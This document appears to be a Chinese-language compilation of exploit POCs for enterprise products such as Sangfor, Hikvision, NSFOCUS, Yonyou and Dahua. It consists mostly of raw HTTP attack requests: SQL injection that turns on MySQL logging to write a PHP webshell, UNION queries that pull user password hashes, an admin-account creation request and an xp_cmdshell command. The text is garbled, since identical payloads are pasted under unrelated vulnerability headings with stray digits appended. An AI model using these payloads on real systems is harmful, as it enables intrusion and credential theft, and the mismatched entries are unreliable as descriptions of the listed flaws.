POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 131Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/settings/system/user.php?m1=7&m2=0
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log=on;","type":"0"}}
设置日志php文件POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868Content-Length: 195Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/114.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://192.168.24.3:6868Referer: http://192.168.24.3:6868/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: SKYLARa0aedxe9e785feabxae789c6e03d=tf2xbucirlmkuqsxpg4bqaq0snb7Connection: close
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log_file=0x2e2e2f2e2e2f436f6e736f6c652f636865636b5f6c6f67696e322e706870;","type":"0"}}
写入php代码POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 222Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/index.php{"settings_distribute_cmd":{"userSession":"{BD435CCE-3F91-E1AA-3844-76A49EE862EB}","mode_id":"3AF264D9-AE5A-86F0-6882-DD7F56827017","settings":"3AF264D9-AE5A-86F0-6882-DD7F56827017_0","SC_list":{"a":"<?php phpinfo();?>"}}}
最后get请求rce:http://192.168.24.3:6868/check_login2.php5

深信服报表 任意读取

开启⽇志/Console/inter/handler/change_white_list_cmd.php id参数
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 131Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/settings/system/user.php?m1=7&m2=0
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log=on;","type":"0"}}
设置日志php文件POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868Content-Length: 195Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/114.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://192.168.24.3:6868Referer: http://192.168.24.3:6868/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: SKYLARa0aedxe9e785feabxae789c6e03d=tf2xbucirlmkuqsxpg4bqaq0snb7Connection: close
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log_file=0x2e2e2f2e2e2f436f6e736f6c652f636865636b5f6c6f67696e322e706870;","type":"0"}}
写入php代码POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 222Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/index.php{"settings_distribute_cmd":{"userSession":"{BD435CCE-3F91-E1AA-3844-76A49EE862EB}","mode_id":"3AF264D9-AE5A-86F0-6882-DD7F56827017","settings":"3AF264D9-AE5A-86F0-6882-DD7F56827017_0","SC_list":{"a":"<?php phpinfo();?>"}}}
最后get请求rce:http://192.168.24.3:6868/check_login2.php6

广联达

广联达oa sql注入漏洞 POC

开启⽇志/Console/inter/handler/change_white_list_cmd.php id参数
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 131Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/settings/system/user.php?m1=7&m2=0
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log=on;","type":"0"}}
设置日志php文件POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868Content-Length: 195Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/114.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://192.168.24.3:6868Referer: http://192.168.24.3:6868/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: SKYLARa0aedxe9e785feabxae789c6e03d=tf2xbucirlmkuqsxpg4bqaq0snb7Connection: close
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log_file=0x2e2e2f2e2e2f436f6e736f6c652f636865636b5f6c6f67696e322e706870;","type":"0"}}
写入php代码POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 222Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/index.php{"settings_distribute_cmd":{"userSession":"{BD435CCE-3F91-E1AA-3844-76A49EE862EB}","mode_id":"3AF264D9-AE5A-86F0-6882-DD7F56827017","settings":"3AF264D9-AE5A-86F0-6882-DD7F56827017_0","SC_list":{"a":"<?php phpinfo();?>"}}}
最后get请求rce:http://192.168.24.3:6868/check_login2.php7

广联达oa 后台文件上传漏洞 POC

开启⽇志/Console/inter/handler/change_white_list_cmd.php id参数
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 131Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/settings/system/user.php?m1=7&m2=0
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log=on;","type":"0"}}
设置日志php文件POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868Content-Length: 195Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/114.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://192.168.24.3:6868Referer: http://192.168.24.3:6868/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: SKYLARa0aedxe9e785feabxae789c6e03d=tf2xbucirlmkuqsxpg4bqaq0snb7Connection: close
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log_file=0x2e2e2f2e2e2f436f6e736f6c652f636865636b5f6c6f67696e322e706870;","type":"0"}}
写入php代码POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 222Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/index.php{"settings_distribute_cmd":{"userSession":"{BD435CCE-3F91-E1AA-3844-76A49EE862EB}","mode_id":"3AF264D9-AE5A-86F0-6882-DD7F56827017","settings":"3AF264D9-AE5A-86F0-6882-DD7F56827017_0","SC_list":{"a":"<?php phpinfo();?>"}}}
最后get请求rce:http://192.168.24.3:6868/check_login2.php8

海康

HiKVISION 综合安防管理平台 files 任意文件上传漏洞 POC

开启⽇志/Console/inter/handler/change_white_list_cmd.php id参数
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 131Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/settings/system/user.php?m1=7&m2=0
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log=on;","type":"0"}}
设置日志php文件POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1Host: 192.168.24.3:6868Content-Length: 195Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/114.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://192.168.24.3:6868Referer: http://192.168.24.3:6868/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: SKYLARa0aedxe9e785feabxae789c6e03d=tf2xbucirlmkuqsxpg4bqaq0snb7Connection: close
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set/**/global/**/general_log_file=0x2e2e2f2e2e2f436f6e736f6c652f636865636b5f6c6f67696e322e706870;","type":"0"}}
写入php代码POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1Host: 192.168.24.3:6868User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 222Origin: http://192.168.24.3:6868Connection: closeReferer: http://192.168.24.3:6868/index.php{"settings_distribute_cmd":{"userSession":"{BD435CCE-3F91-E1AA-3844-76A49EE862EB}","mode_id":"3AF264D9-AE5A-86F0-6882-DD7F56827017","settings":"3AF264D9-AE5A-86F0-6882-DD7F56827017_0","SC_list":{"a":"<?php phpinfo();?>"}}}
最后get请求rce:http://192.168.24.3:6868/check_login2.php9

HiKVISION 综合安防管理平台 report 任意文件上传漏洞 POC

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --0

马儿路径:/portal/ui/login/..;/..;/new.jsp

网神

网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞 POC

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --1

木马路径:attachements/xxx.php

网神 SecSSL 3600安全接入网关系统 任意密码修改漏洞 POC

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --2

汉德

汉得SRM tomcat.jsp 登录绕过漏洞 POC

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --3

然后访问后台:/main.screen

绿盟

绿盟sas安全审计系统任意文件读取漏洞

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --4

绿盟 SAS堡垒机 Exec 远程命令执行漏洞

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --5

任意用户登录-SAS堡垒机 local_user.php 任意用户登录漏洞 

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --6

安恒

安恒明御运维审计与风险控制系统堡垒机任意用户注册 POC

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --7

辰信景云

辰信景云终端安全管理系统 login SQL注入漏洞 POC

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --8

帆软

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --9

蓝凌

OA前台代码执行 POC

GET /user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............ HTTP/1.10

用友

用友移动管理系统 uploadApk.do 任意文件上传漏洞

GET /user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............ HTTP/1.11

用友时空KSOA PayBill SQL注入漏洞

GET /user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............ HTTP/1.12

exec master..xp_cmdshell 'whoami';

大华

大华智慧园区综合管理平台 searchJson SQL注入漏洞

GET /user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............ HTTP/1.13

大华智慧园区综合管理平台 文件上传漏洞

GET /user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............ HTTP/1.14



零日/一日 漏洞探讨加 Seven_-0928 、banxor9

本实验室接受正规站点的授权渗透测试服务。如你的公司业务有Web渗透测试,高级渗透测试,红蓝对抗,黑客溯源,Java代码审计等需求可联系以下微信进行商务洽谈:Xud330327

同时欢迎各位师傅加入HW闲聊吹水群(2000人群)



推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
ZhouSa.com